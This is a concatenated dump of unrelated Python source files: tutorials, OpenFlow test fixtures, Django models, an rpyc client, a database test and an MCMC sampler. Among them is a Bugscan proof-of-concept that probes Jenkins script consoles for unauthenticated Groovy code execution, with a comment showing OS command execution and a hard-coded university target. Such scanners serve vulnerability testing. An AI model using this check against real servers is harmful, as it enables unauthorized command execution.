# estos es un cometario en python #decalro una variable x = 5 # imprime variable print ("x =",x) #operaciones aritmeticas print ("x - 5 = ",x - 5) print ("x + 5 = ",x + 5) print ("x * 5 = ",x * 5) print ("x % 5 = ",x % 5) print ("x / 5 = ",x /5) print ("x // 5 = ",x //5) print ("x ** 5 = ",x **5)
2.359375
2
tests/rulesets/sample_rules.py
wandsdn/ofsolver
1
12755371
<reponame>wandsdn/ofsolver from ryu.ofproto import ofproto_v1_3 from ryu.ofproto import ofproto_v1_3_parser as parser import pickle """ Make the rules for a simple L2 L3 pipeline ETH_DST 1&2 +--------------+ | | | 2 Routing | | | | IP_DST -> | +-------------+ +--------------+ +---> OUTPUT | | | | | | | SET MAC | | 0 TCP ACL | | 1 MAC TERM | | | | | (TCP_DST) | | ETH_DST -> | | | | | DROP | | goto : 2 | | +--------------+ | +-------> +-+ | else | | else | | | | goto: 3 | | goto: 1 | | +-+ +-------------+ +--------------+ | ETH_DST 10&11&12 | +---------------+ | | | | | 3 L2 FWD | | | | +--^+ ETH_DST -> | | OUTPUT | | | | | | | | | +---------------+ """ flows = [ # Table 0 parser.OFPFlowStats( table_id=0, priority=1000, match=parser.OFPMatch(tcp_dst=80), instructions=[] ), parser.OFPFlowStats( table_id=0, priority=1000, match=parser.OFPMatch(tcp_dst=443), instructions=[] ), parser.OFPFlowStats( table_id=0, priority=0, match=parser.OFPMatch(), instructions=[parser.OFPInstructionGotoTable(1)] ), # Table 1 parser.OFPFlowStats( table_id=1, priority=1000, match=parser.OFPMatch(eth_dst=1), instructions=[parser.OFPInstructionGotoTable(2)] ), parser.OFPFlowStats( table_id=1, priority=1000, match=parser.OFPMatch(eth_dst=2), instructions=[parser.OFPInstructionGotoTable(2)] ), parser.OFPFlowStats( table_id=1, priority=0, match=parser.OFPMatch(), instructions=[parser.OFPInstructionGotoTable(3)] ), # Table 2 parser.OFPFlowStats( table_id=2, priority=1008, match=parser.OFPMatch(ipv4_dst=("1.0.0.0", "255.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=100), parser.OFPActionSetField(eth_dst=20), parser.OFPActionOutput(20) ] ) ] ), parser.OFPFlowStats( table_id=2, priority=1008, match=parser.OFPMatch(ipv4_dst=("10.0.0.0", "255.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=100), parser.OFPActionSetField(eth_dst=20), parser.OFPActionOutput(20) ] ) ] ), parser.OFPFlowStats( table_id=2, priority=1000, match=parser.OFPMatch(ipv4_dst=("0.0.0.0", "0.0.0.0")), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionSetField(eth_src=101), parser.OFPActionSetField(eth_dst=21), parser.OFPActionOutput(21) ] ) ] ), # Table 3 parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=10), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(10) ] ) ] ), parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=11), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(11) ] ) ] ), parser.OFPFlowStats( table_id=3, priority=1000, match=parser.OFPMatch(eth_dst=12), instructions=[ parser.OFPInstructionActions( ofproto_v1_3.OFPIT_WRITE_ACTIONS, [ parser.OFPActionOutput(12) ] ) ] ), ] with open('sample_rules.pickle', 'wb') as f: pickle.dump(flows, f)
1.367188
1
pyleecan/Methods/Slot/HoleM53/get_height_magnet.py
helene-t/pyleecan
1
12755499
# -*- coding: utf-8 -*- def get_height_magnet(self): """get the height of the hole magnets Parameters ---------- self : HoleM53 A HoleM53 object Returns ------- Hmag: float height of the 2 Magnets [m] """ # magnet_0 and magnet_1 have the same height Hmag = self.H2 return Hmag
2.078125
2
server/test_client.py
adp162/alexa-vera-bridge
13
12755627
<reponame>adp162/alexa-vera-bridge #!/usr/bin/python import sys import os from shutil import copyfile import argparse import time import threading # Actually use the client code to test sending server message # Note that you must have ../lambda in your PYTHONPATH variable for this # to work (e.g. export PYTHONPATH=../lambda) import client # Thread to send a bunch of messages to the server def client_thread(i): print 'starting thread ' + str(i) data = [ { 'id':1, 'action': {'type': 'get' } }, { 'id':2, 'action': {'type': 'set', 'attribute': {'power': 0} } }, { 'id':3, 'action': {'type': 'run' } }, { 'id':4, 'action': {'type': 'get' } }, { 'id':5, 'action': {'type': 'set', 'attribute': {'power': 1} } }, { 'id':6, 'action': {'type': 'run' } } ] # Send the messages a bunch of times for j in range(100): send_data(data) print 'thread ' + str(i) + ' finished' # Pass in a list of data (or single element) def send_data(data): # Try connecting to the Vera server (socket, msg) = client.open_connection_to_vera() if socket == None: print 'Error connecting to AVBServer: ' + msg sys.exit() # Send the test messages and check response if type(data) is list: for d in data: resp = client.send_vera_message(socket, d) assert d == resp['data'] else: resp = client.send_vera_message(socket, data) assert data == resp['data'] # Close the connection client.close_connection_to_vera(socket) def main(): # NOTE: These tests should run with the server option "--no-vera" specified # since they are designed to check the response matches the data sent. # To send a real command to Vera, use the command line argument described # below. parser = argparse.ArgumentParser() parser.add_argument('-a', '--action', help='action type', type=str, choices=['get', 'set', 'run']) parser.add_argument('-d', '--device', help='device id', type=int) parser.add_argument('-c', '--command', help='the command to send', type=str, choices=['on', 'off']) args = parser.parse_args() # Change to lambda directory because all the client.py functions assume the # files they need (certs, config, etc.) are in the same directory print 'in ' + os.getcwd() os.chdir('../lambda') print 'changed to ' + os.getcwd() # Temporarily copy sample security assets to lambda directory copyfile('../security/sample/rootCA.pem', './rootCA.pem') copyfile('../security/sample/client.crt', './client.crt') copyfile('../security/sample/client.key', './client.key') copyfile('../security/sample/psk.bin', './psk.bin') # Did we specify any of the optional arguments? if args.action or args.device or args.command: # Do some sanity checks if args.action is None or args.device is None: parser.error('You must specify device, and action') if args.action == 'set' and args.command is None: parser.error('You must specify a command with set action') # Setup the data, run the request, then exit attr = None if args.command == 'on': attr = {'power': 1} elif args.command == 'off': attr = {'power': 0} data = { 'id':args.device, 'action': {'type': args.action, 'attribute': attr } } run_test(0, data) else: # TEST: Run scene 1 print 'Running test #1' data = { 'id':1, 'action': {'type': 'run' } } send_data(data) print # TEST: Run scene 2 print 'Running test #2' data = { 'id':2, 'action': {'type': 'run' } } send_data(data) print # TEST: Turn device 1 on and get status print 'Running test #3' data = [ { 'id':1, 'action': {'type': 'set', 'attribute': {'power': 1} } }, { 'id':1, 'action': {'type': 'get' } } ] send_data(data) print # TEST: Get status, turn device 1 off, get status again print 'Running test #4' data = [ { 'id':1, 'action': {'type': 'get' } }, { 'id':1, 'action': {'type': 'set', 'attribute': {'power': 0} } }, { 'id':1, 'action': {'type': 'get' } } ] send_data(data) print # TEST: leave socket open (eventually server should kill) print 'Running test #5' (socket, msg) = client.open_connection_to_vera() print 'sleeping for 10s...' # Server will close() the socket time.sleep(10) try: resp = client.send_vera_message(socket, { 'id':1, 'action': {'type': 'get' } } ) except RuntimeError as e: print 'Failed correctly with: ' + str(e) print # TEST: poorly formatted message (should catch AVBMessage exception) print 'Running test #6' (socket, msg) = client.open_connection_to_vera() try: resp = client.send_vera_message(socket, 'bad message') except ValueError as e: print 'Failed correctly with: ' + str(e) print # TEST: message too long (should catch AVBMessage exception) print 'Running test #7' (socket, msg) = client.open_connection_to_vera() try: # Send a super long tag to ensure resulting JSON string is too long resp = client.send_vera_message(socket, { 't'*9999:1 } ) except ValueError as e: print 'Failed correctly with: ' + str(e) print # TEST: bombard server with simultaneous requests print 'Running test #8' threads = [] for i in range(10): t = threading.Thread(target=client_thread, args=(i,)) t.start() threads.append(t) for t in threads: t.join() print # Remove the security assets copied earlier os.remove('rootCA.pem') os.remove('client.crt') os.remove('client.key') os.remove('psk.bin') if __name__ == '__main__': main()
2.078125
2
app/models/phone.py
olivierpons/evalr
0
12755755
<filename>app/models/phone.py from django.db import models from app.models.base import BaseModel class Phone(BaseModel): phone = models.CharField(max_length=30, blank=True, null=True)
0.914063
1
fiepipelib/fiepipeserver/client.py
leith-bartrich/fiepipe
0
12755883
import rpyc import rpyc.utils import rpyc.utils.zerodeploy import plumbum.machines.paramiko_machine import fiepipelib.localuser.routines.localuser class client(object): """Local client for the fiepipeserver server""" _localUser = None _hostname = None _username = None _policy = None def __init__(self, hostname, username, localUser, autoAddHosts=False): """@param autoAddHosts: If true, automatically adds hosts to the list of trusted hosts if it hasn't seen them before. If false, it rejects them. """ assert isinstance(localUser, fiepipelib.localuser.routines.localuser.LocalUserRoutines) self._localUser = localUser self._hostname = hostname self._username = username self._connections = [] if autoAddHosts: self._policy = plumbum.machines.paramiko_machine.paramiko.AutoAddPolicy else: self._policy = plumbum.machines.paramiko_machine.paramiko.RejectPolicy _machine = None _server = None _connections = None def GetHostsFilePath(self): return os.path.joint(self._localUser.get_pipe_configuration_dir(), "fiepipeclient_known_hosts.txt") def RemoveKnownHost(self): hosts = plumbum.machines.paramiko_machine.paramiko.HostKeys(self.GetHostsFilePath()) if hosts.lookup(self._hostname) != None: hosts.pop(self._hostname) hosts.save(self.GetHostsFilePath()) def getConnection(self): """Warning. missing host policy is auto-add. The first time you connect to this thing, make sure you actually trust your DNS and network. Subsequent reconnections should be secure. """ if len(self._connections) != 0: return self._connections.pop() else: if self._machine == None: self._machine = plumbum.machines.paramiko_machine.ParamikoMachine(host=self._hostname,user=self._username,missing_host_policy=self._policy,keyfile=self.GetHostsFilePath()) if self._server == None: self._server = rpyc.utils.zerodeploy.DeployedServer(remote_machine=self._machine,server_class='fiepipelib.fiepipeserver.server.server') connection = self._server.connect() return connection def returnConnection(self, connection): if not connection.closed: self._connections.append(connection) def close(self): if self._server != None: self._server.close() for c in self._connections: c.close() self._connections.clear() def get_all_registered_sites(self, connection, fqdn): """Usually, this data is harmless if spoofed. Annoying for sure, but harmless. All warnings about signatures should be heeded when one uses this info to connect to a site later however. """ return connection.get_all_registered_sites(fqdn) def get_all_regestered_legal_entities(self, connection): """This can be a good legal entity distribution mechanism as long as the user knows how to verify connect securely the first time they pull. See getConnection for the technical explanation. Ultimately, the question is: do you trust the server you logged into originally? """ return connection.get_all_regestered_legal_entities() def get_all_registered_containers(self, connection): """This can be a good container distribution mechanism as long as the user knows how to verify a secure connection the first time they pull. See getConnection for the technical explanation. Ultimately, the quesation is: do you trust the server you logged into originally? Consider using a site statesever method instead, as you can validate that the legal entity trusts the state server even if you've never seen it before. """ return connection.get_all_registered_containers() def get_registered_containers_by_fqdn(self, connection, fqdn): """See get_all_registered_containers @param fqdn: the fqdn to restrict the search to. """ return connection.get_registered_containers_by_fqdn(fqdn) def set_registered_containers(self, connection, containers): """Sets the given cainters to the registry on the server. Used to push containers.""" return connection.set_registered_containers(containers) def ping(self, connection): return connection.ping()
1.523438
2
tests/query/bugs/fixed_bigint_2031.py
liuqian1990/nebula
8,586
12756011
# --coding:utf-8-- # # Copyright (c) 2020 vesoft inc. All rights reserved. # # This source code is licensed under Apache 2.0 License. import time from tests.common.nebula_test_suite import NebulaTestSuite class TestBigInt(NebulaTestSuite): @classmethod def prepare(self): resp = self.execute( 'CREATE SPACE IF NOT EXISTS BigInt2031(partition_num={partition_num}, replica_factor={replica_factor})' .format(partition_num=self.partition_num, replica_factor=self.replica_factor)) self.check_resp_succeeded(resp) time.sleep(self.delay) resp = self.execute('USE BigInt2031') self.check_resp_succeeded(resp) def test_issue2031(self): time.sleep(self.delay) resp = self.execute( 'CREATE TAG person1(name string, age bigint)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person2(name string, age bigint DEFAULT 100)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person3(name string, age Bigint)') self.check_resp_failed(resp) resp = self.execute( 'CREATE TAG person4(name string, age BIGINT)') self.check_resp_failed(resp) @classmethod def cleanup(self): resp = self.execute('drop space BigInt2031') self.check_resp_succeeded(resp)
1.273438
1
public_21CMvFAST_MC/Programs/CosmoHammer_21CMMC/sampler/CosmoHammerSampler.py
NNSSA/21cmvFAST
5
12756139
<filename>public_21CMvFAST_MC/Programs/CosmoHammer_21CMMC/sampler/CosmoHammerSampler.py #!/usr/bin/env python import CosmoHammer_21CMMC import CosmoHammer_21CMMC.constants.Constants as c from CosmoHammer_21CMMC.util.SampleFileUtil import SampleFileUtil from CosmoHammer_21CMMC.sampler.util.IterationStopCriteriaStrategy import IterationStopCriteriaStrategy from CosmoHammer_21CMMC.sampler.util.VariousInitialConditionGenerators import UniformPosition from CosmoHammer_21CMMC import emcee import numpy as np import logging import time class CosmoHammerSampler(object): """ A complete sampler implementation taking care of correct setup, chain burn in and sampling. :param params: the parameter of the priors :param likelihoodComputationChain: the callable computation chain :param filePrefix: the prefix for the log and output files :param walkerRatio: the ratio of walkers and the count of sampled parameters :param burninIterations: number of iteration for burn in :param sampleIterations: number of iteration to sample :param stopCriteriaStrategy: the strategy to stop the sampling. Default is None an then IterationStopCriteriaStrategy is used :param initPositionGenerator: the generator for the init walker position. Default is None an then SampleBallPositionGenerator is used :param fileUtil: util used to store the results :param threadCount: The count of threads to be used for the computation. Default is 1 :param reuseBurnin: Flag if the burn in should be reused. If true the values will be read from the file System. Default is False """ def __init__(self, params,likelihoodComputationChain, filePrefix, walkersRatio, burninIterations, sampleIterations, FiducialParams, param_legend, LowerBound_XRAY, UpperBound_XRAY, SpinTz, filethin = 1, stopCriteriaStrategy=None, initPositionGenerator=None, storageUtil=None, threadCount=1, reuseBurnin=False): """ CosmoHammer sampler implementation """ self.likelihoodComputationChain = likelihoodComputationChain self.walkersRatio = walkersRatio self.reuseBurnin = reuseBurnin self.filePrefix = filePrefix self.threadCount = threadCount self.paramCount = len(params[:,0]) self.nwalkers = self.paramCount*walkersRatio self.burninIterations = burninIterations self.sampleIterations = sampleIterations self.filethin = filethin self.FiducialParams = FiducialParams self.param_legend = param_legend self.LowerBound_XRAY = LowerBound_XRAY self.UpperBound_XRAY = UpperBound_XRAY self.SpinTz = SpinTz self.lowerbounds = params[:,0] self.upperbounds = params[:,1] assert sampleIterations > 0, "CosmoHammer needs to sample for at least one iterations" # setting up the logging self._configureLogging(filePrefix+c.LOG_FILE_SUFFIX) self.log("Using CosmoHammer "+str(CosmoHammer_21CMMC.__version__)) # The sampler object self._sampler = self.createEmceeSampler(likelihoodComputationChain) if(storageUtil is None): storageUtil = self.createSampleFileUtil() self.storageUtil = storageUtil if(stopCriteriaStrategy is None): stopCriteriaStrategy = self.createStopCriteriaStrategy() stopCriteriaStrategy.setup(self) self.stopCriteriaStrategy = stopCriteriaStrategy if(initPositionGenerator is None): initPositionGenerator = self.createInitPositionGenerator() initPositionGenerator.setup(self) self.initPositionGenerator = initPositionGenerator def _configureLogging(self, filename): logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', filename=filename, filemode='w', level=logging.INFO) def createStopCriteriaStrategy(self): """ Returns a new instance of a stop criteria stategy """ return IterationStopCriteriaStrategy() def createSampleFileUtil(self): """ Returns a new instance of a File Util """ return SampleFileUtil(self.filePrefix, reuseBurnin=self.reuseBurnin) def createInitPositionGenerator(self): """ Returns a new instance of a Init Position Generator """ """ This needs to me made more intelligent, rather than being hard coded! """ return UniformPosition() # @profile def startSampling(self): """ Launches the sampling """ self.log(self.__str__()) if(self.burninIterations>0): if(self.reuseBurnin): pos, prob, NF_Values_old, rstate = self.loadBurnin() datas = [None]*len(pos) if 'singlez' in self.filePrefix: NF_Values = [[float(q)] for q in NF_Values_old] NF_Values = np.array(NF_Values) else: NF_Values = NF_Values_old else: pos, prob, NF_Values, rstate, datas = self.startSampleBurnin() else: pos = self.createInitPos() prob = None NF_Values = None rstate = None datas = None # Starting from the final position in the burn-in chain, sample for 1000 # steps. self.log("start sampling after burn in") start = time.time() self.sample(pos, prob, NF_Values, rstate, datas) end = time.time() self.log("sampling done! Took: " + str(round(end-start,4))+"s") # Print out the mean acceptance fraction. In general, acceptance_fraction # has an entry for each walker self.log("Mean acceptance fraction:"+ str(round(np.mean(self._sampler.acceptance_fraction), 4))) def loadBurnin(self): """ loads the burn in form the file system """ self.log("reusing previous burn in") pos = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_SUFFIX)[-self.nwalkers:] prob = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_PROB_SUFFIX)[-self.nwalkers:] NF_Values = self.storageUtil.importFromFile(self.filePrefix+c.BURNIN_NF_SUFFIX)[-self.nwalkers:] rstate= self.storageUtil.importRandomState(self.filePrefix+c.BURNIN_STATE_SUFFIX) self.log("loading done") return pos, prob, NF_Values, rstate # @profile def startSampleBurnin(self): """ Runs the sampler for the burn in """ self.log("start burn in") start = time.time() p0 = self.createInitPos() pos, prob, NF_Values, rstate, data = self.sampleBurnin(p0) end = time.time() self.log("burn in sampling done! Took: " + str(round(end-start,4))+"s") self.log("Mean acceptance fraction for burn in:" + str(round(np.mean(self._sampler.acceptance_fraction), 4))) self.resetSampler() return pos, prob, NF_Values, rstate, data def resetSampler(self): """ Resets the emcee sampler in the master node """ if self.isMaster(): self.log("Reseting emcee sampler") # Reset the chain to remove the burn-in samples. self._sampler.reset() # @profile def sampleBurnin(self, p0): """ Run the emcee sampler for the burnin to create walker which are independent form their starting position """ counter = 1 counter_thin = 0 for pos, prob, neutral_fractions, rstate, datas in self._sampler.sample(p0, iterations=self.burninIterations): if self.isMaster(): counter_thin += 1 if(counter_thin==self.filethin): self.storageUtil.persistBurninValues(pos, prob, neutral_fractions, datas) counter_thin = 0 if(counter%10==0): self.log("Iteration finished:" + str(counter)) counter = counter + 1 if self.isMaster(): self.log("storing random state") self.storageUtil.storeRandomState(self.filePrefix+c.BURNIN_STATE_SUFFIX, rstate) return pos, prob, neutral_fractions, rstate, datas # @profile def sample(self, burninPos, burninProb=None, burninNF_Values=None, burninRstate=None, datas=None): """ Starts the sampling process """ counter = 1 counter_thin = 0 for pos, prob, NF_Values, _, datas in self._sampler.sample(burninPos, lnprob0=burninProb, neutral_fractions0=burninNF_Values, rstate0=burninRstate, blobs0=datas, iterations=self.sampleIterations): if self.isMaster(): counter_thin += 1 if(counter_thin==self.filethin): self.storageUtil.persistSamplingValues(pos, prob, NF_Values, datas) counter_thin = 0 if(self.stopCriteriaStrategy.hasFinished()): break if(counter%10==0): self.log("Iteration finished:" + str(counter)) counter = counter + 1 def isMaster(self): """ Returns True. Can be overridden for multitasking i.e. with MPI """ return True def log(self, message): """ Logs a message to the logfile """ logging.info(message) def createEmceeSampler(self, callable): """ Factory method to create the emcee sampler """ self.log("Using emcee "+str(emcee.__version__)) # print 'Create the Emcee Sampler' return emcee.EnsembleSampler(self.nwalkers, self.paramCount, callable, lower_bounds=self.lowerbounds, upper_bounds=self.upperbounds, threads=self.threadCount) def createInitPos(self): """ Factory method to create initial positions """ return self.initPositionGenerator.generate() def getChain(self): """ Returns the sample chain """ return self._sampler.chain() def __str__(self, *args, **kwargs): """ Returns the string representation of the sampler config """ desc = "Sampler: " + str(type(self))+"\n" \ "configuration: \n" \ " Burnin iterations: " +str(self.burninIterations)+"\n" \ " Samples iterations: " +str(self.sampleIterations)+"\n" \ " Walkers ratio: " +str(self.walkersRatio)+"\n" \ " Reusing burn in: " +str(self.reuseBurnin)+"\n" \ " init pos generator: " +str(self.initPositionGenerator)+"\n" \ " stop criteria: " +str(self.stopCriteriaStrategy)+"\n" \ " storage util: " +str(self.storageUtil)+"\n" \ "likelihoodComputationChain: \n" + str(self.likelihoodComputationChain) \ +"\n" return desc
1.382813
1
HackerRank/Interview Preparation Kit/Warm-up Challenges/Jumping-on-the-Clouds.py
nayanapardhekar/Python
37
12756267
<filename>HackerRank/Interview Preparation Kit/Warm-up Challenges/Jumping-on-the-Clouds.py n=int(input()) a=list(map(int,input().split())) jump=0 i=0 while i<=n: if i+2<n and a[i+2]==0: jump+=1 i+=2 elif i+1<n and a[i+1]==0: jump+=1 i+=1 else: i+=1 print(jump)
2.4375
2
Week 3/ex4.py
rmit-s3559384-andrew-alvaro/IoT
0
12756395
<reponame>rmit-s3559384-andrew-alvaro/IoT from virtual_sense_hat import VirtualSenseHat sense = VirtualSenseHat.getSenseHat() # OR # sense = VirtualSenseHat.getSenseHat(False) temperature = sense.get_temperature() sense.show_message('Temperature: {0:0.1f} *C'.format(temperature)) humidity = sense.get_humidity() sense.show_message('Humidity: {0:0.0f}%'.format(humidity)) sense.clear()
1.328125
1
test_kivy/test_kvv/Ba/tela.py
robertoweller/python
2
12756523
<filename>test_kivy/test_kvv/Ba/tela.py def tam(): '''Futuramente facilitar o mudo de como mundar o tamanho das peças.''' tel = 1.25 return tel
0.894531
1
backend/polzyFunctions/tests/conftest.py
Athos1972/PoLZy
0
12756651
import pytest from polzybackend import create_app, models, db from config import Config from copy import deepcopy import polzyFunctions import os if not os.path.basename(os.getcwd()) == "tests": os.chdir(os.path.join(os.path.dirname(polzyFunctions.__file__), "tests")) @pytest.fixture(scope="session", params=["pqa"]) def stage(request): return request.param @pytest.fixture def user(stage=stage, email="<EMAIL>"): """ A is read from the database. if nothing stated, it will be <EMAIL> from stage = PQA :param stage: :param email: :return: """ app = create_app(Config) app.app_context().push() with db.session.no_autoflush: user = deepcopy(db.session.query(models.User).filter_by(email=email).first()) user.stage = stage yield user db.session.remove()
1.367188
1
container/__init__.py
sdss/lvmtan
0
12756779
<gh_stars>0 # -*- coding: utf-8 -*- # # @Author: <NAME> (<EMAIL> # @Date: 2021-06-15 # @Filename: __init__.py # @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause) import os import shlex import subprocess import sys import time from pathlib import PosixPath import click import pexpect # from podman import PodmanClient # uri = "unix:///run/user/1000/podman/podman.sock" # podman container exists ubuntu_lvmt_tan # 0=True, 1=False container_bin = "podman" lvmt_root = os.environ["PWD"] lvmt_image_source_local = "localhost" lvmt_image_source_remote = "ghcr.io/sdss" lvmt_image_name = "lvmtan" default_basdard_test = "test.first.focus_stage" def config(name, pstfx="-sim.conf"): return f"{'/'.join(str.split(name,'.')[:-1])}/{name}{pstfx}" def isRunning(name: str = default_basdard_test): command = subprocess.run(shlex.split(f"{container_bin} container exists {name}")) return not command.returncode # True if running def getXauthority(): for xa in [f"/run/user/{os.getuid()}/gdm/Xauthority", "~/.Xauthority"]: xa = PosixPath(xa).expanduser() if xa.exists(): return xa return None @click.command() @click.option("--lvmt_root", default=lvmt_root, type=str) @click.option("--use-cache/--no-cache", default=True) def build(lvmt_root: str, use_cache: bool): tan_dockerfile = f"{lvmt_root}/container" lvmt_image_fullbuild = "" if use_cache else " --no-cache" print( f"{container_bin} build --tag {lvmt_image_name}{lvmt_image_fullbuild} --rm {tan_dockerfile}" ) build = f"{container_bin} build --tag {lvmt_image_name}{lvmt_image_fullbuild} --rm {tan_dockerfile}" command = subprocess.run(shlex.split(build)) @click.command() @click.option("--lvmt_root", default=lvmt_root, type=str) @click.option("--with-ui/--without-ui", default=True) @click.option("--with-hw/--without-hw", default=False) @click.option("--debug/--no-debug", "-d", default=False) @click.option("--kill/--no-kill", default=False) @click.option("--name", "-n", default=default_basdard_test, type=str) def start(name: str, with_ui: bool, with_hw: bool, lvmt_root: str, debug:bool, kill:bool): if not subprocess.run(shlex.split(f"podman image exists {lvmt_image_source_local}/{lvmt_image_name}")).returncode: lvmt_image = f"{lvmt_image_source_local}/{lvmt_image_name}" else: if subprocess.run(shlex.split(f"podman image exists {lvmt_image_source_remote}/{lvmt_image_name}")).returncode: subprocess.run(shlex.split(f"podman pull {lvmt_image_source_remote}/{lvmt_image_name}:latest")) lvmt_image = f"{lvmt_image_source_remote}/{lvmt_image_name}" if kill: subprocess.run(shlex.split(f"{container_bin} kill {name}")) run_base = f"--rm -t --name {name} --network=host" if os.path.exists("/usr/bin/crun"): run_base += f" --runtime /usr/bin/crun" system_xauthority = getXauthority() if with_ui and os.environ.get("DISPLAY") and system_xauthority: run_base += f" -e DISPLAY -v {system_xauthority}:/root/.Xauthority:Z --ipc=host" if os.path.exists("/dev/dri"): run_base += " --device /dev/dri" name_ui = config(name, pstfx=".ui") if os.path.exists(f"{lvmt_root}/config/{name_ui}"): run_base += f" -e BASDARD_UI={name_ui}" print(debug) if debug: run_base += f" -e TAN_DEBUG=true" run_with_hw = "-svr.conf" if with_hw else "-sim.conf" run_tan = f"-v {lvmt_root}:/root/lvmt:Z -e BASDARD_CONFIG={config(name, pstfx = run_with_hw)}" run = f"{container_bin} run {run_base} {run_tan} {lvmt_image}" print(run) child = pexpect.spawn(run) child.expect("Connected to") assert isRunning(name) == True @click.command() @click.option("--name", "-n", default=default_basdard_test, type=str) def stop(name: str): command = subprocess.run(shlex.split(f"{container_bin} kill {name}"))
1.578125
2
setup.py
oogles/django-project-base
0
12756907
<gh_stars>0 import re from setuptools import setup, find_packages from codecs import open # To use a consistent encoding from os import path here = path.abspath(path.dirname(__file__)) source_dir = '' # the name of the directory containing the source, relative to "here" # Read the long description from the README file with open(path.join(here, 'README.rst'), encoding='utf-8') as f: long_description = f.read() # Read the version from __init__.py version_re = r'^__version__ = [\'"]([^\'"]*)[\'"]' init_path = path.join(here, source_dir, '__init__.py') with open(init_path) as f: match = re.search(version_re, f.read(), re.MULTILINE) if match: version = match.group(1) else: raise RuntimeError('Unable to find __version__ in {0}'.format(init_path)) setup( name='', version=version, description='', long_description=long_description, license='MIT', url='', author='', author_email='', packages=find_packages(exclude=['docs']), # install_requires=, # python_requires= classifiers=[ ] )
1.484375
1
django_dvbboxes/urls.py
drowolath/django-dvbboxes
1
12757035
from django.conf.urls import url from . import views app_name = 'django_dvbboxes' urlpatterns = [ # views.media urls url(r'media/check/$', views.media, name='media_check'), url(r'media/search/$', views.media, name='media_search'), url(r'media/delete/(?P<filename>\w+)/$', views.media, name='media_delete'), url(r'media/rename/(?P<filename>\w+)/$', views.media, name='media_rename'), url(r'media/(?P<filename>\w+)/$', views.media, name='media_infos'), # views.listing urls url(r'listing/apply/$', views.listing, name='applylisting'), url(r'listing/$', views.listing, name='listing'), # views.program urls url(r'program/$', views.program, name='program'), url(r'^$', views.index, name='index'), ]
0.769531
1
Python/EXERCICIOS/Strings/Desafio024 - Strings.py
ccpn1988/Python
0
12757163
<reponame>ccpn1988/Python # VALIDAR SE A CIDADE DIGITADA INICIA COM O NOME SANTO: cidade = str(input('Digite a cidade em que nasceu... ')).strip() print(cidade[:5].upper() == 'SANTO')
2.34375
2
aiobungie/undefined.py
nxtlo/aiobungie
36
12757291
# MIT License # # Copyright (c) 2020 - Present nxtlo # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """An undefined type object.""" from __future__ import annotations import typing _T = typing.TypeVar("_T", covariant=True) class UndefinedType: """An `UNDEFINED` type.""" __instance: typing.ClassVar[UndefinedType] def __bool__(self) -> typing.Literal[False]: return False def __repr__(self) -> str: return "UNDEFINED" def __str__(self) -> str: return "UNDEFINED" def __new__(cls) -> UndefinedType: try: return cls.__instance except AttributeError: o = super().__new__(cls) cls.__instance = o return cls.__instance Undefined: typing.Final[UndefinedType] = UndefinedType() """An undefined type for attribs that may be undefined and not None.""" UndefinedOr = typing.Union[UndefinedType, _T] """A union version of the Undefined type which can be undefined or any other type."""
1.546875
2
Bugscan_exploits-master/exp_list/exp-1667.py
csadsl/poc_exp
11
12757419
#!/usr/bin/env python # -*- coding: utf-8 -*- """ POC Name : jenkins_script_console_java_execution Author : fenyouxiangyu mail : <EMAIL> Referer : http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html """ # Description : This module uses the Jenkins Groovy script console to execute OS commands using Java. # Command : println "netstat -aon".execute().text import urlparse def assign(service, arg): if service == 'jenkins': return True, arg def audit(arg): add_url = 'script/' url = arg + add_url payload ='script=println%28Jenkins%29&json=%7B%22script%22%3A+%22println%28Jenkins%29%22%2C+%22%22%3A+%22%22%7D' code, head, res, errcode, _= curl.curl2(url,payload) if code == 200 and 'class jenkins.model.Jenkins' in res: security_hole(url) if __name__ == '__main__': from dummy import * audit(assign('jenkins', 'http://sinv-56038.edu.hsr.ch/jenkins/')[1])
1.390625
1
python_packages/pytorch/4_extending_with_python/CUDACpp_exts/2_PMTS_custom_cuda_kernel/setup.py
trisct/Software-Tutorials
2
12757547
from setuptools import setup from torch.utils.cpp_extension import BuildExtension, CUDAExtension # [!!!] be sure to use different file names for cpp and cu files # because `setuptools` does not see the filename extension setup( name='PMTS_cuda', ext_modules=[ CUDAExtension('PMTS_cuda', [ 'PMTS_cuda.cpp', 'PMTS_cuda_kernels.cu', ]) ], cmdclass={ 'build_ext': BuildExtension })
0.644531
1
ohmystars/tests.py
wolfg1969/oh-my-stars
76
12757675
